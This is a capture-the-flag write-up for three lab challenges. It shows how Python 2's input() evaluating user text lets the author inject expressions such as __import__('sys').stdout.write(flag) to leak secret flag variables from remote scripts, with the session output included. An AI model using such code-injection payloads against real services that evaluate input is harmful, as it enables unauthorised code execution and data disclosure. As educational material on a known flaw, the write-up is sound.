# 13374C4D3MY: whyton1/2/3 
_Guess the number! Or do it the other way! :D_

_nc SOME.SERVER 2220_

M4t35Z already covered this topic in his [WriteUp](https://m4t3sz.gitlab.io/bsc/writeup/ctf/2021/13374C4D3MY/), but I wanted to create my own, becuase I solved it with a different approach.
I would like to combine 3 challenges in this, because I used the same method in all of them. 
I know, the methods used by M4t35Z are simpler, and more obvius, but it seems that my mind just can't think simple. I am overengineering everything:/.

So, we had 3 `python` scripts running on a remote server, but we had the source codes. You cand find them in my repo.
We can see, that our flag was stored in the `flag` variable. Ok, in the sources we have them redacted, but you have them on the server.
We can also see, that all the scripts are using the `input()` function, which in python2 has a [vulnerability](https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/). 

Let's give those interpreters some work, shall we?

Here is our magic input:
```python
__import__("sys").stdout.write(flag+"\n")
```

And this gave me the flag, with all 3 scripts.

_hax1_
```
Guess the secret number(0-200): __import__("sys").stdout.write(flag+"\n")      
flag{4yy_4_py2_1337_h3R3}
Wrong! TRY H4RD3R! :(
```

_hax2_
```
Password > __import__("sys").stdout.write(flag+"\n")
flag{U_4r3_4_Py7H0n2_31337__BTW_d0n7_u53_17}
Wrong!
The password was: jzpcvpxnltgugsbwmrqdltjgoaxudkwssnxynhypihyrfrqrfpowtvkmsoyzjvlijwmav
```

_hax3_
```
Password > __import__("sys").stdout.write(flag + "\n")
Traceback (most recent call last):
  File "hax3.py", line 7, in <module>
    if input("Password > ") == password:
  File "<string>", line 1, in <module>
TypeError: unsupported operand type(s) for +: 'int' and 'str'
```
Aaa, right. I almost forgot, for the third one we had a different description:
_Because of the nature of the challenge, the flag contains only numbers! After you get the flag, you need to wrap it with flag{} to be correct, and send it in like that._

So I have issues appending the newline to the flag, because it is a number type now. I could print it without newline, I guess, but I can always convert it to string:
```
Password > __import__("sys").stdout.write(str(flag) + "\n") 
133769420694201337
Wrong!
The password was: qlcfzvkfnfdifvvmgqkwzvdecrbrkmdslpyoelwjdfmsnwmhqgwsujxswnghzxocshgch
```

And it worked again!:D The last flag was _flag{133769420694201337}_.

_PS:_
Before this method, I tried a similar one, which worked for me locally, but not on the server:
```python
open("/dev/tty","w").write(flag)
```

This complained about the non-existing `/dev/tty` on the server. Some virtualization limitations, I guess.

_PS2:_
I received some feedback. **djohni**, from the _13374C4D3MY_ discord channel showed the most elegant method, at least I like this one the most:
```python
input(flag)
```

Thanks, **djohni**!
